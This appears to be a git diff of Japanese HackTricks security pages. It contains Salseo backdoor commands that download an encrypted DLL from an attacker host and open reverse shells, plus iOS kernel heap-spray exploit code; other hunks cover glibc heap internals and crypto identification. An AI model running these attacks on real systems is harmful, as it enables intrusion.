### **Python**
```
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
### ウィンドウズ
```
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
わかりました。Salseoのすべてを実行するために必要なものは揃っています: **エンコードされた EvilDalsa.dll****SalseoLoader のバイナリ** です。
**SalseoLoader.exe バイナリをマシンにアップロードしてください。どのAVにも検出されないはずです...**
## **バックドアを実行する**
### **TCP リバースシェルを取得するHTTP 経由でエンコードされた dll をダウンロードする)**
nc をリバースシェルリスナーとして起動し、エンコードされた evilsalsa を提供する HTTP サーバーを起動することを忘れないでください。
```
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
```
### **UDPリバースシェルの取得SMBを通じてエンコードされたdllをダウンロード**
リバースシェルリスナーとしてncを起動し、エンコードされたevilsalsaを提供するためにSMBサーバーを起動することを忘れないでください。
```
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
```
### **ICMPリバースシェルの取得被害者の中にエンコードされたdllが既に存在する**
**今回は、リバースシェルを受信するためにクライアントに特別なツールが必要です。ダウンロードしてください:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
#### **ICMP応答を無効にする:**
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
#### クライアントを実行する:
```
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
```
#### 被害者の内部で、salseoのことを実行しましょう:
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
```
## SalseoLoaderをDLLとしてコンパイルし、メイン関数をエクスポートする
Visual Studioを使用してSalseoLoaderプロジェクトを開きます。
### メイン関数の前に追加: \[DllExport]
![](<../images/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
### このプロジェクトにDllExportをインストールする
#### **ツール** --> **NuGetパッケージマネージャー** --> **ソリューションのNuGetパッケージを管理...**
![](<../images/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
#### **DllExportパッケージを検索ブラウズタブを使用、インストールを押すポップアップを受け入れる**
![](<../images/image (4) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
プロジェクトフォルダーに**DllExport.bat**と**DllExport_Configure.bat**のファイルが表示されます。
### **U**ninstall DllExport
**アンインストール**を押します(変ですが、信じてください、必要です)
![](<../images/image (5) (1) (1) (2) (1).png>)
### **Visual Studioを終了し、DllExport_configureを実行する**
Visual Studioを**終了**します。
次に、**SalseoLoaderフォルダー**に移動し、**DllExport_Configure.bat**を実行します。
**x64**を選択しますx64ボックス内で使用する場合、私のケースではそうでした、**System.Runtime.InteropServices**を選択します(**DllExportの名前空間内**)そして**適用**を押します。
![](<../images/image (7) (1) (1) (1) (1).png>)
### **Visual Studioでプロジェクトを再度開く**
**\[DllExport]**はもはやエラーとしてマークされていないはずです。
![](<../images/image (8) (1).png>)
### ソリューションをビルドする
**出力タイプ = クラスライブラリ**を選択します(プロジェクト --> SalseoLoaderプロパティ --> アプリケーション --> 出力タイプ = クラスライブラリ)
![](<../images/image (10) (1).png>)
**x64** **プラットフォーム**を選択します(プロジェクト --> SalseoLoaderプロパティ --> ビルド --> プラットフォームターゲット = x64
![](<../images/image (9) (1) (1).png>)
ソリューションを**ビルド**するには: ビルド --> ソリューションのビルド出力コンソール内に新しいDLLのパスが表示されます
### 生成されたDllをテストする
テストしたい場所にDllをコピーして貼り付けます。
実行:
```
rundll32.exe SalseoLoader.dll,main
```
エラーが表示されない場合、おそらく機能するDLLがあります!!
## DLLを使用してシェルを取得する
**HTTP** **サーバー**を使用し、**nc** **リスナー**を設定することを忘れないでください。
### Powershell
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
### CMD
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
{{#include ../banners/hacktricks-training.md}}

4
src/binary-exploitation/arbitrary-write-2-exec/README.md
View File

@ -1 +1,3 @@
# 任意書き込み2実行
# Arbitrary Write 2 Exec
{{#include /banners/hacktricks-training.md}}

40
src/binary-exploitation/ios-exploiting.md
View File

@ -1,8 +1,10 @@
# iOS Exploiting
{{#include /banners/hacktricks-training.md}}
## Physical use-after-free
これは[https://alfiecg.uk/2024/09/24/Kernel-exploit.html](https://alfiecg.uk/2024/09/24/Kernel-exploit.html)の投稿からの要約であり、この技術を使用したエクスプロイトに関するさらなる情報は[https://github.com/felix-pb/kfd](https://github.com/felix-pb/kfd)で見つけることができます。
これは[https://alfiecg.uk/2024/09/24/Kernel-exploit.html](https://alfiecg.uk/2024/09/24/Kernel-exploit.html)からの投稿の要約であり、この技術を使用したエクスプロイトに関するさらなる情報は[https://github.com/felix-pb/kfd](https://github.com/felix-pb/kfd)で見つけることができます。
### Memory management in XNU <a href="#memory-management-in-xnu" id="memory-management-in-xnu"></a>
@ -31,18 +33,18 @@ iOSのユーザープロセスの**仮想メモリアドレス空間**は**0x0
#### Example: Mapping a Virtual Address
仮に仮想アドレス**0x1000000000**にアクセスしようとするとします
仮に仮想アドレス**0x1000000000**にアクセスしようとすると:
1. **L1 Table**:
* カーネルは、この仮想アドレスに対応するL1ページテーブルエントリをチェックします。もし**L2ページテーブルへのポインタ**があれば、そのL2テーブルに進みます。
* カーネルは、この仮想アドレスに対応するL1ページテーブルエントリを確認します。もし**L2ページテーブルへのポインタ**があれば、そのL2テーブルに進みます。
2. **L2 Table**:
* カーネルは、より詳細なマッピングのためにL2ページテーブルをチェックします。このエントリが**L3ページテーブル**を指している場合、そこに進みます。
* カーネルは、より詳細なマッピングのためにL2ページテーブルを確認します。このエントリが**L3ページテーブル**を指している場合、そこに進みます。
3. **L3 Table**:
* カーネルは最終的なL3エントリを調べ、実際のメモリページの**物理アドレス**を指します。
#### Example of Address Mapping
物理アドレス**0x800004000**をL2テーブルの最初のインデックスに書き込むと、次のようになります
物理アドレス**0x800004000**をL2テーブルの最初のインデックスに書き込むと
* 仮想アドレス**0x1000000000**から**0x1002000000**は、物理アドレス**0x800004000**から**0x802004000**にマッピングされます。
* これはL2レベルでの**ブロックマッピング**です。
@ -69,21 +71,21 @@ iOSのユーザープロセスの**仮想メモリアドレス空間**は**0x0
攻撃者は解放されたメモリにどの特定のカーネルページが割り当てられるかを制御できないため、**ヒープスプレー**と呼ばれる技術を使用します:
1. 攻撃者はカーネルメモリに**多数のIOSurfaceオブジェクト**を作成します。
2. 各IOSurfaceオブジェクトは、そのフィールドの1つに**マジックバリュー**が含まれており、識別が容易です。
3. 攻撃者は**解放されたページをスキャン**して、これらのIOSurfaceオブジェクトのいずれかが解放されたページに配置されているかを確認します。
2. 各IOSurfaceオブジェクトは、そのフィールドの1つに**マジック値**を含んでおり、識別が容易です。
3. 彼らは**解放されたページをスキャン**して、これらのIOSurfaceオブジェクトのいずれかが解放されたページに配置されているかどうかを確認します。
4. 解放されたページにIOSurfaceオブジェクトを見つけると、それを使用して**カーネルメモリを読み書き**できます。
この詳細については[https://github.com/felix-pb/kfd/tree/main/writeups](https://github.com/felix-pb/kfd/tree/main/writeups)を参照してください。
### Step-by-Step Heap Spray Process
1. **Spray IOSurface Objects**: 攻撃者は特別な識別子(「マジックバリューを持つ多くのIOSurfaceオブジェクトを作成します。
2. **Scan Freed Pages**: 彼らは、オブジェクトのいずれかが解放されたページに割り当てられているかを確認します。
3. **Read/Write Kernel Memory**: IOSurfaceオブジェクトのフィールドを操作することで、カーネルメモリ内で**任意の読み取りと書き込み**を行う能力を得ます。これにより、彼らは:
1. **Spray IOSurface Objects**: 攻撃者は特別な識別子(「マジックを持つ多くのIOSurfaceオブジェクトを作成します。
2. **Scan Freed Pages**: 彼らは、オブジェクトのいずれかが解放されたページに割り当てられているかどうかを確認します。
3. **Read/Write Kernel Memory**: IOSurfaceオブジェクトのフィールドを操作することで、カーネルメモリ内で**任意の読み書き**を行う能力を得ます。これにより、彼らは:
* 1つのフィールドを使用してカーネルメモリ内の**任意の32ビット値**を**読み取る**ことができます。
* 別のフィールドを使用して**64ビット値を書き込む**ことができ、安定した**カーネル読み書きプリミティブ**を実現します。
* 別のフィールドを使用して**64ビット値を書き込む**ことができ、安定した**カーネル読み書きプリミティブ**を実現します。
IOSURFACE_MAGICというマジックバリューを持つIOSurfaceオブジェクトを生成して、後で検索します
IOSURFACE_MAGICというマジックを持つIOSurfaceオブジェクトを生成して、後で検索します
```c
void spray_iosurface(io_connect_t client, int nSurfaces, io_connect_t **clients, int *nClients) {
if (*nClients >= 0x4000) return;
@ -138,9 +140,9 @@ free(surfaceIDs);
return 0;
}
```
### IOSurfaceを使用したカーネルの読み書きの実現
### カーネルの読み書きをIOSurfaceで実現する
カーネルメモリ内のIOSurfaceオブジェクトを制御できるようになると(ユーザースペースからアクセス可能な解放された物理ページにマッピングされている)、**任意のカーネル読み書き操作**に使用できます。
カーネルメモリ内のIOSurfaceオブジェクトユーザースペースからアクセス可能な解放された物理ページにマッピングされているを制御できるようになると、**任意のカーネル読み書き操作**に使用できます。
**IOSurfaceの重要なフィールド**
@ -193,11 +195,13 @@ set_indexed_timestamp(info.client, info.surface, value);
iosurface_set_indexed_timestamp_pointer(info.object, orig);
}
```
#### エクスプロイトフローの再確認
#### エクスプロイトフローの要約
1. **物理的なUse-After-Freeをトリガー**: 解放されたページは再利用可能です。
2. **IOSurfaceオブジェクトをスプレー**: カーネルメモリにユニークな「マジックバリュー」を持つ多くのIOSurfaceオブジェクトを割り当てます。
3. **アクセス可能なIOSurfaceを特定**: 制御している解放されたページ上のIOSurfaceを見つけます。
4. **Use-After-Freeを悪用**: IOSurfaceオブジェクト内のポインタを変更して、IOSurfaceメソッドを介して任意の**カーネル読み書き**を可能にします。
3. **アクセス可能なIOSurfaceを特定**: 制御可能な解放されたページ上のIOSurfaceを見つけます。
4. **Use-After-Freeを悪用**: IOSurfaceオブジェクト内のポインタを変更して、IOSurfaceメソッドを介して任意の**カーネル読み取り/書き込み**を可能にします。
これらのプリミティブを使用して、エクスプロイトは制御された**32ビットの読み取り**と**64ビットの書き込み**をカーネルメモリに提供します。さらなる脱獄ステップでは、より安定した読み書きプリミティブが必要になる可能性があり、追加の保護新しいarm64eデバイスのPPLをバイパスする必要があるかもしれません。
これらのプリミティブを使用して、エクスプロイトはカーネルメモリへの制御された**32ビット読み取り**と**64ビット書き込み**を提供します。さらなる脱獄手順には、追加の保護新しいarm64eデバイスのPPLをバイパスする必要があるかもしれない、より安定した読み取り/書き込みプリミティブが含まれる可能性があります。
{{#include /banners/hacktricks-training.md}}

71
src/binary-exploitation/libc-heap/README.md
View File

@ -1,18 +1,20 @@
# Libc Heap
## ヒープの基本
{{#include /banners/hacktricks-training.md}}
ヒープは基本的に、プログラムが**`malloc`**、`calloc`などの関数を呼び出してデータを要求する際にデータを保存できる場所です。さらに、このメモリがもはや必要ない場合は、**`free`**関数を呼び出すことで利用可能になります。
## Heap Basics
示されているように、これはバイナリがメモリに読み込まれた直後の場所です(`[heap]`セクションを確認してください):
ヒープは基本的に、プログラムが**`malloc`**、`calloc`などの関数を呼び出してデータを要求する際にデータを保存できる場所です。さらに、このメモリがもはや必要なくなったときは、**`free`**関数を呼び出すことで利用可能になります。
示されているように、これはバイナリがメモリにロードされた直後の場所です(`[heap]`セクションを確認してください):
<figure><img src="../../images/image (1241).png" alt=""><figcaption></figcaption></figure>
### 基本的なチャンクの割り当て
### Basic Chunk Allocation
ヒープに保存するデータが要求されると、ヒープの一部がそれに割り当てられます。このスペースはビンに属し、要求されたデータ + ビンヘッダーのスペース + 最小ビンサイズオフセットの分だけがチャンクのために予約されます。目標は、各チャンクの位置を見つけるのを複雑にせず、できるだけ少ないメモリを予約することです。このために、メタデータチャンク情報を使用して、使用中/未使用の各チャンクの位置を把握します。
ヒープにデータを保存するために要求されると、ヒープの一部がそのために割り当てられます。このスペースはビンに属し、要求されたデータ + ビンヘッダーのスペース + 最小ビンサイズオフセットの分だけがチャンクのために予約されます。目標は、各チャンクの位置を見つけるのを複雑にせず、できるだけ少ないメモリを予約することです。このために、メタデータチャンク情報が使用され、使用中/未使用の各チャンクの位置を把握します。
スペースを予約する方法はいくつかありますが、主に使用されるビンに依存しますが、一般的な方法論は次のとおりです:
スペースを予約する方法はいくつかありますが、主に使用されるビンによって異なりますが、一般的な方法論は次のとおりです:
- プログラムは特定の量のメモリを要求することから始まります。
- チャンクのリストに、要求を満たすのに十分な大きさの空きがあれば、それが使用されます。
@ -23,21 +25,21 @@
要求された**メモリが閾値を超えた場合**、**`mmap`**が要求されたメモリをマッピングするために使用されることに注意してください。
## アリーナ
## Arenas
**マルチスレッド**アプリケーションでは、ヒープマネージャーはクラッシュを引き起こす可能性のある**レースコンディション**を防ぐ必要があります。最初は、グローバルミューテックスを使用して、同時に1つのスレッドだけがヒープにアクセスできるようにしていましたが、これによりミューテックスによるボトルネックが発生し、**パフォーマンスの問題**が生じました。
**マルチスレッド**アプリケーションでは、ヒープマネージャーはクラッシュを引き起こす可能性のある**レースコンディション**を防ぐ必要があります。最初は、**グローバルミューテックス**を使用して、同時に1つのスレッドだけがヒープにアクセスできるようにしていましたが、これによりミューテックスによるボトルネックが発生し、**パフォーマンスの問題**が生じました。
これに対処するために、ptmalloc2ヒープアロケータは「アリーナ」を導入しました。ここで**各アリーナ**は**独自の**データ**構造**と**ミューテックス**を持つ**別々のヒープ**として機能し、異なるアリーナを使用する限り、複数のスレッドが互いに干渉することなくヒープ操作を実行できます。
デフォルトの「メイン」アリーナは、シングルスレッドアプリケーションのヒープ操作を処理します。**新しいスレッド**が追加されると、ヒープマネージャーは競合を減らすために**セカンダリアリーナ**を割り当てます。最初に、各新しいスレッドを未使用のアリーナに接続しようとし、必要に応じて新しいアリーナを作成します。32ビットシステムではCPUコア数の2倍、64ビットシステムでは8倍の制限があります。制限に達すると、**スレッドはアリーナを共有しなければならず**、競合の可能性が生じます。
デフォルトの「メイン」アリーナは、シングルスレッドアプリケーションのヒープ操作を処理します。**新しいスレッド**が追加されると、ヒープマネージャーは競合を減らすために**セカンダリアリーナ**を割り当てます。最初に、各新しいスレッドを未使用のアリーナに接続しようとし、必要に応じて新しいアリーナを作成します。32ビットシステムではCPUコア数の2倍、64ビットシステムでは8倍までの制限があります。制限に達すると、**スレッドはアリーナを共有しなければならず**、競合が発生する可能性があります。
メインアリーナとは異なり、`brk`システムコールを使用して拡張されるメインアリーナに対し、セカンダリアリーナは`mmap``mprotect`を使用して「サブヒープ」を作成し、マルチスレッド操作のためのメモリ管理の柔軟性を提供します。
### サブヒープ
### Subheaps
サブヒープは、マルチスレッドアプリケーションにおけるセカンダリアリーナのメモリ予備として機能し、メインヒープとは別に自分自身のヒープ領域を成長させ、管理することを可能にします。サブヒープが初期ヒープとどのように異なり、どのように機能するかは次のとおりです:
サブヒープは、マルチスレッドアプリケーションのセカンダリアリーナのためのメモリ予備として機能し、メインヒープとは別に自分自身のヒープ領域を成長させ、管理できるようにします。サブヒープが初期ヒープとどのように異なり、どのように機能するかは次のとおりです:
1. **初期ヒープサブヒープ**
1. **初期ヒープ vs. サブヒープ**
- 初期ヒープはプログラムのバイナリの直後にメモリに位置し、`sbrk`システムコールを使用して拡張されます。
- セカンダリアリーナによって使用されるサブヒープは、指定されたメモリ領域をマッピングするシステムコールである`mmap`を通じて作成されます。
2. **`mmap`によるメモリ予約**
@ -76,7 +78,7 @@ char pad[-3 * SIZE_SZ & MALLOC_ALIGN_MASK];
この構造体から注目すべき興味深い点がいくつかあります以下のCコードを参照
- `__libc_lock_define (, mutex);` は、このヒープの構造体が1つのスレッドによって同時にアクセスされることを保証するためにあります。
- `__libc_lock_define (, mutex);` は、このヒープの構造体が1つのスレッドによってのみアクセスされることを保証するためにあります。
- フラグ:
- ```c
@ -88,11 +90,11 @@ char pad[-3 * SIZE_SZ & MALLOC_ALIGN_MASK];
#define set_contiguous(M) ((M)->flags &= ~NONCONTIGUOUS_BIT)
```
- `mchunkptr bins[NBINS * 2 - 2];`**小さな、大きな、未ソートの** **ビン**の**最初と最後のチャンク**への**ポインタ**を含んでいます(-2はインデックス0が使用されないためです
- `mchunkptr bins[NBINS * 2 - 2];` は**小さな、大きな、未ソートの** **ビン**の**最初と最後のチャンク**への**ポインタ**を含んでいます(-2はインデックス0が使用されていないためです)。
- したがって、これらのビンの**最初のチャンク**はこの構造体への**逆ポインタ**を持ち、これらのビンの**最後のチャンク**はこの構造体への**前方ポインタ**を持ちます。基本的に、もしあなたが**メインアリーナでこれらのアドレスを漏洩させることができれば**、あなたは**libc**内の構造体へのポインタを持つことになります。
- 構造体`struct malloc_state *next;``struct malloc_state *next_free;`はアリーナのリンクリストです。
- `top`チャンクは最後の「チャンク」であり、基本的に**ヒープの残りのすべてのスペース**です。トップチャンクが「空」であるとき、ヒープは完全に使用されており、さらにスペースを要求する必要があります。
- `last reminder`チャンクは、正確なサイズのチャンクが利用できない場合に発生し、したがって大きなチャンクが分割され、残りの部分のポインタがここに置かれます。
- `top`チャンクは最後の「チャンク」であり、基本的に**ヒープの残りのすべてのスペース**です。トップチャンクが「空」になると、ヒープは完全に使用され、さらにスペースを要求する必要があります。
- `last reminder`チャンクは、正確なサイズのチャンクが利用できない場合に発生し、そのため大きなチャンクが分割され、残りの部分のポインタがここに置かれます。
```c
// From https://github.com/bminor/glibc/blob/a07e000e82cb71238259e674529c37c12dc7d423/malloc/malloc.c#L1812
@ -167,9 +169,9 @@ typedef struct malloc_chunk* mchunkptr;
- `M`: 1の場合、このチャンクはmmapで割り当てられたスペースの一部であり、ヒープの一部ではありません
- `P`: 1の場合、前のチャンクは使用中です
次に、ユーザーデータのためのスペースがあり、最後にチャンクが利用可能なときの前のチャンクサイズを示すために0x08Bがありますまたは割り当てられているときにユーザーデータを格納するため)。
次に、ユーザーデータのためのスペースがあり、最後にチャンクが利用可能なときに前のチャンクサイズを示すための0x08Bがありますまたは割り当てられたときにユーザーデータを格納します)。
さらに、利用可能な場合、ユーザーデータは他のデータも含むために使用されます:
さらに、利用可能な場合、ユーザーデータは以下のデータを含むためにも使用されます:
- **`fd`**: 次のチャンクへのポインタ
- **`bk`**: 前のチャンクへのポインタ
@ -178,13 +180,13 @@ typedef struct malloc_chunk* mchunkptr;
<figure><img src="../../images/image (1243).png" alt=""><figcaption><p><a href="https://azeria-labs.com/wp-content/uploads/2019/03/chunk-allocated-CS.png">https://azeria-labs.com/wp-content/uploads/2019/03/chunk-allocated-CS.png</a></p></figcaption></figure>
> [!NOTE]
> このようにリストをリンクすることで、すべてのチャンクが登録されている配列を持つ必要がなくなることに注意してください
> [!TIP]
> このようにリストをリンクすることで、すべてのチャンクが登録されている配列を持つ必要がなくなります
### チャンクポインタ
mallocが使用されると、書き込むことができるコンテンツへのポインタが返されますヘッダーの直後)、ただし、チャンクを管理する際には、ヘッダー(メタデータ)の先頭へのポインタが必要です。\
これらの変換には次の関数が使用されます:
mallocが使用されると、書き込むことができるコンテンツへのポインタが返されますヘッダーのすぐ後)。ただし、チャンクを管理する際には、ヘッダー(メタデータ)の先頭へのポインタが必要です。\
これらの変換には次の関数が使用されます:
```c
// https://github.com/bminor/glibc/blob/master/malloc/malloc.c
@ -259,7 +261,7 @@ req = (req + (__MTAG_GRANULE_SIZE - 1)) &
return request2size (req);
}
```
合計必要スペースを計算する際、`prev_size` フィールドがデータを格納するために使用できるため、`SIZE_SZ` は1回だけ追加されることに注意してください。そのため、初期ヘッダーのみが必要です。
注意:必要な総スペースを計算する際、`prev_size` フィールドはデータを格納するために使用できるため、`SIZE_SZ` は1回だけ追加されることに注意してください。最初のヘッダーのみが必要です。
### チャンクデータを取得し、メタデータを変更する
@ -295,7 +297,7 @@ the chunk to the user, if necessary. */
/* Mark a chunk as not being on the main arena. */
#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
```
- サイズと他のチャンクへのポインタ
- 他のチャンクへのサイズとポインタ
```c
/*
Bits to mask off when extracting size
@ -328,7 +330,7 @@ people extending or adapting this malloc.
/* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s) ((mchunkptr) (((char *) (p)) + (s)))
```
- インスイービット
- インシュービット
```c
/* extract p's inuse bit */
#define inuse(p) \
@ -352,7 +354,7 @@ people extending or adapting this malloc.
#define clear_inuse_bit_at_offset(p, s) \
(((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
```
- チャンク番号が使用されている場合、ヘッダーとフッターを設定する
- チャンク番号が使用されている場合、ヘッダーとフッターを設定します。
```c
/* Set size at head, without disturbing its use bit */
#define set_head_size(p, s) ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
@ -409,11 +411,11 @@ ptr = malloc(0x10);
strcpy(ptr, "panda");
}
```
メイン関数の終わりにブレークポイントを設定し、情報がどこに保存されたかを見てみましょう:
メイン関数の終わりにブレークポイントを設定し、情報がどこに保存されているかを確認しましょう:
<figure><img src="../../images/image (1239).png" alt=""><figcaption></figcaption></figure>
文字列pandaが`0xaaaaaaac12a0`に保存されていることがわかります(これは`x0`内のmallocによって返されたアドレスです。0x10バイト前を確認すると、`0x0`は**前のチャンクが使用されていない**ことを示しており長さ0、このチャンクの長さは`0x21`す。
文字列pandaが`0xaaaaaaac12a0`に保存されていることがわかります(これは`x0`内のmallocからの応答として与えられたアドレスです。その10バイト前を確認すると、`0x0`が**前のチャンクが使用されていない**長さ0ことを示し、このチャンクの長さが`0x21`であることがわかります。
予約された余分なスペース0x21-0x10=0x11は**追加ヘッダー**0x10から来ており、0x1は0x21Bが予約されたことを意味するのではなく、現在のヘッダーの長さの最後の3ビットには特別な意味があります。長さは常に16バイト境界に揃えられているため64ビットマシンで、これらのビットは実際には長さの数値によって使用されることはありません。
```
@ -481,23 +483,26 @@ return 0;
<figure><img src="../../images/image (2) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
## Bins & Memory Allocations/Frees
## ビンとメモリの割り当て/解放
ビンが何であり、どのように整理されているか、メモリがどのように割り当てられ、解放されるかを確認してください:
ビンが何であり、どのように整理され、メモリがどのように割り当てられ、解放されるかを確認してください:
{{#ref}}
bins-and-memory-allocations.md
{{#endref}}
## Heap Functions Security Checks
## ヒープ関数のセキュリティチェック
ヒープに関与する関数は、アクションを実行する前に特定のチェックを行い、ヒープが破損していないことを確認しようとします:
ヒープに関与する関数は、ヒープが破損していないことを確認するために、アクションを実行する前に特定のチェックを行います:
{{#ref}}
heap-memory-functions/heap-functions-security-checks.md
{{#endref}}
## References
## 参考文献
- [https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/](https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/)
- [https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/)
{{#include /banners/hacktricks-training.md}}

19
src/burp-suite.md
View File

@ -1,19 +0,0 @@
{{#include ./banners/hacktricks-training.md}}
# 基本ペイロード
- **シンプルリスト:** 各行にエントリが含まれるリスト
- **ランタイムファイル:** ランタイムで読み込まれるリスト(メモリにロードされない)。大きなリストをサポートするため。
- **ケース変更:** 文字列のリストにいくつかの変更を適用する(変更なし、小文字、大文字、適切な名前 - 最初の文字を大文字にし、残りを小文字にする、適切な名前 - 最初の文字を大文字にし、残りはそのままにする)。
- **数字:** XからYまでの数字をZステップで生成するか、ランダムに生成する。
- **ブルートフォース:** 文字セット、最小および最大長。
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : コマンドを実行し、burpcollabへのDNSリクエストを介して出力を取得するためのペイロード。
{{#ref}}
https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e
{{#endref}}
[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
{{#include ./banners/hacktricks-training.md}}

52
src/crypto-and-stego/cryptographic-algorithms/README.md
View File

@ -1,12 +1,10 @@
# 暗号化/圧縮アルゴリズム
## 暗号化/圧縮アルゴリズム
{{#include ../../banners/hacktricks-training.md}}
## アルゴリズムの特定
コードが**右シフトと左シフト、XORおよびいくつかの算術演算**を使用している場合、それは**暗号化アルゴリズム**の実装である可能性が高いです。ここでは、**各ステップを逆にすることなく使用されているアルゴリズムを特定する方法**をいくつか示します。
コードが**シフト右および左、XORおよびいくつかの算術演算**を使用している場合、それは**暗号化アルゴリズム**の実装である可能性が高いです。ここでは、**各ステップを逆にすることなく使用されているアルゴリズムを特定する方法**をいくつか示します。
### API関数
@ -16,7 +14,7 @@
![](<../../images/image (156).png>)
可能なアルゴリズムとその割り当てられた値の表はここで確認できます: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
可能なアルゴリズムとその割り当てられた値の表をこちらで確認してください: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
**RtlCompressBuffer/RtlDecompressBuffer**
@ -24,16 +22,16 @@
**CryptAcquireContext**
[ドキュメントから](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta): **CryptAcquireContext**関数は、特定の暗号サービスプロバイダーCSP内の特定のキーコンテナへのハンドルを取得するために使用されます。**この返されたハンドルは、選択されたCSPを使用するCryptoAPI**関数への呼び出しで使用されます。
[ドキュメント](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta)から: **CryptAcquireContext**関数は、特定の暗号サービスプロバイダーCSP内の特定のキーコンテナへのハンドルを取得するために使用されます。**この返されたハンドルは、選択されたCSPを使用するCryptoAPI**関数への呼び出しで使用されます。
**CryptCreateHash**
データストリームのハッシュを開始します。この関数が使用されている場合、第二のパラメータの値を確認することで**使用されているアルゴリズム**を見つけることができます:
データストリームのハッシュを開始します。この関数が使用されている場合、第二のパラメータの値を確認することで**使用されているアルゴリズム**を見つけることができます:
![](<../../images/image (549).png>)
\
可能なアルゴリズムとその割り当てられた値の表はここで確認できます: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
可能なアルゴリズムとその割り当てられた値の表をこちらで確認してください: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
### コード定数
@ -51,26 +49,26 @@
### データ情報
コードに重要な定数がない場合、**.dataセクションから情報を読み込んでいる可能性があります**。\
そのデータにアクセスし、**最初のDWORDをグループ化**し、前のセクションで行ったようにGoogleで検索できます
そのデータにアクセスし、**最初のdwordをグループ化**し、前のセクションで行ったようにGoogleで検索できます
![](<../../images/image (531).png>)
この場合、**0xA56363C6**を検索すると、**AESアルゴリズムのテーブル**に関連していることがわかります。
## RC4 **(対称暗号)**
## RC4 **(対称暗号)**
### 特徴
3つの主要な部分で構成されています
- **初期化ステージ/**: **0x00から0xFFまでの値のテーブルを作成**します合計256バイト、0x100。このテーブルは一般に**置換ボックス**またはSBoxと呼ばれます。
- **スクランブリングステージ**: 前に作成したテーブルを**ループ**し0x100回のイテレーションのループ、各値を**半ランダム**なバイトで修正します。この半ランダムなバイトを作成するために、RC4の**キーが使用されます**。RC4の**キー**は**1バイトから256バイトの長さ**である可能性がありますが、通常は5バイト以上が推奨されます。一般的に、RC4のキーは16バイトの長さです。
- **スクランブリングステージ**: 前に作成したテーブルを**ループ**し0x100回のイテレーションのループ、各値を**半ランダム**なバイトで修正します。この半ランダムなバイトを作成するために、RC4の**キーが使用されます**。RC4の**キー**は**1バイトから256バイトの長さ**であることができますが、通常は5バイト以上が推奨されます。一般的に、RC4のキーは16バイトの長さです。
- **XORステージ**: 最後に、平文または暗号文は**前に作成された値とXORされます**。暗号化と復号化の関数は同じです。これには、作成された256バイトを必要な回数だけループします。これは通常、逆コンパイルされたコードで**%256mod 256**として認識されます。
> [!NOTE]
> [!TIP]
> **逆アセンブル/逆コンパイルされたコードでRC4を特定するには、サイズ0x100の2つのループキーを使用を確認し、その後、2つのループで前に作成された256の値と入力データのXORを行うことを確認します。おそらく%256mod 256を使用します。**
### **初期化ステージ/置換ボックス:**カウンタとして使用される256の数と、256文字の各場所に0が書かれていることに注意
### **初期化ステージ/置換ボックス:**カウンタとして使用される256という数字と、256文字の各場所に0が書かれていることに注意
![](<../../images/image (584).png>)
@ -82,39 +80,39 @@
![](<../../images/image (904).png>)
## **AES(対称暗号)**
## **AES (対称暗号)**
### **特徴**
- **置換ボックスとルックアップテーブルの使用**
- **特定のルックアップテーブル値**定数の使用によりAESを**区別することが可能**です。_定数は**バイナリに保存**されるか、_ _**動的に作成**される可能性があります。_
- **暗号化キー**は**16で割り切れる**必要があります通常32B、通常は16Bの**IV**が使用されます。
- **特定のルックアップテーブル値**定数の使用によりAESを**区別することが可能です**。_注意すべきは、**定数**は**バイナリに保存**されるか、_ _**動的に作成**_される可能性があります。_
- **暗号化キー**は**16で割り切れる**必要があり通常32B、通常は16Bの**IV**が使用されます。
### SBox定数
